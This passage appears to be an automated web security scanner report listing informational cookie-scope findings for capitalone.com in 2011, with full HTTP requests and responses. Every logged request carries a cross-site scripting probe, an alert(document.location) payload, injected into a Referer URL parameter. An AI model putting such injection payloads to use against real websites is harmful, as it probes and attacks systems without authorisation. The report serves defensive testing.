Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
Landing Page w/ Accordion Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.
...[SNIP]...

9.16. http://www.capitalone.com/css/page-type/portal_popup.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_popup.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=D266E53D0B03223F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/page-type/portal_popup.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=D266E53D0B03223F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1108
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

.popup-lrg{
   width:760px;
}

.popup #page-body{
   padding: 0px 10px;
}

.popup #page-heading{
   margin-top:0px!important;
}

#popup-close{
   position:absolute;
   top:10px;
   right:10px;
}

...[SNIP]...

9.17. http://www.capitalone.com/css/page-type/portal_product.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_product.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=1B84F757B67B6884; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/page-type/portal_product.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=1B84F757B67B6884; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1888
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
Product Page Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
--------
...[SNIP]...

9.18. http://www.capitalone.com/css/portal_footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_footer.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=18941BEAA04F3459; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/portal_footer.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=18941BEAA04F3459; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1447
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Footer Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.
...[SNIP]...

9.19. http://www.capitalone.com/css/portal_header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_header.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=FC628D4CC1E8D53; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/portal_header.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=FC628D4CC1E8D53; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 19495
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Header Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capita
...[SNIP]...

9.20. http://www.capitalone.com/css/portal_page-nav-heading.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_page-nav-heading.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=336BE560308D6ECB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/portal_page-nav-heading.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=336BE560308D6ECB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5428
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
Page Breadcrumb, Heading, and Secondary Navigation Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: d
...[SNIP]...

9.21. http://www.capitalone.com/img/global/icon/lock.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/icon/lock.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=8EA70C0FA4A60600; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/global/icon/lock.gif HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=8EA70C0FA4A60600; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 13 Aug 2009 17:20:04 GMT
Accept-Ranges: bytes
Content-Length: 486
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

GIF89a.. .................@I.y................R+E...............Y......Q.....................................!.......,...... ....` ..R..@.H3.".
.q.(...g..C...d
).....NJMJ..)...f&.!S;...@Li...q.."..d.(
...[SNIP]...

9.22. http://www.capitalone.com/img/global/logo/ehl.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/ehl.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=E628BAC2937BAB66; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/global/logo/ehl.png HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:38 GMT
Server: Apache
Set-Cookie: v1st=E628BAC2937BAB66; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT
Accept-Ranges: bytes
Content-Length: 448
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/png
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

.PNG
.
...IHDR.............U.oY....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...3PLTE...........................................................tRNS.................%..b....IDATx...... .Di..f
...[SNIP]...

9.23. http://www.capitalone.com/img/global/logo/fdic.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/fdic.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=34DF7D6482753A91; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/global/logo/fdic.png HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:37 GMT
Server: Apache
Set-Cookie: v1st=34DF7D6482753A91; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT
Accept-Ranges: bytes
Content-Length: 549
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/png
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

.PNG
.
...IHDR...a.........E.#.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...0PLTE................................................&.......tRNS.................#]...._IDATx...... .........{
...[SNIP]...

9.24. http://www.capitalone.com/img/global/logo/sprite/header.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/sprite/header.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=416EE042D34F4E42; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/global/logo/sprite/header.gif HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=416EE042D34F4E42; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT
Accept-Ranges: bytes
Content-Length: 6003
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

GIF89a........aL...:z..SZ.q[.......{d..............jb......jj.C3.iS.ZE...$j............t...R...46.......L:..|............].....W...v{...i..t............zn....dj.U.....CG.........6v.....;..dP...E...`..
...[SNIP]...

9.25. http://www.capitalone.com/js/component/portal_accordion.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_accordion.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=9A9F2B2775C2D986; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/component/portal_accordion.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=9A9F2B2775C2D986; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 3659
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

//Declare variables
var activeItem = 1;
var animationDuration = 900;
var hrefAttr = "";
var titleAttr = "";

//Define default animation easing
jQuery.easing.def = "easeInOutCubic";

//Collaps
...[SNIP]...

9.26. http://www.capitalone.com/js/component/portal_open_account.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_open_account.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=54FB887DB689A0C6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/component/portal_open_account.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
